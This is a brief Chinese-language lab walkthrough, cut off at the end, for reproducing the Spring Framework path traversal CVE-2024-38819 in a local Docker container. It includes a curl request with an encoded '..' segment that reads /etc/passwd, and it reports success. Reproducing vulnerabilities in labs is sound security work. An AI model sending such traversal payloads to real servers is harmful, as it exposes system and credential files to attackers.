操作:
根据CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞搭建复现的靶场环境
拿到环境的源码使用docker搭建
cd vuln
创建容器并启动
docker build -t cve-2024-38819-poc .
docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
注意在创建的时候有些镜像无法拉取到,可以在Dockerfile文件中修改配置使用其他的镜像
使用命令来验证是否存在漏洞
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
请求成功返回了 /etc/passwd
文件的内容,证明存在该漏洞
该漏洞利用了路径遍历问题,使攻击者能够访问系统中本不应暴露的文件(如 /etc/pa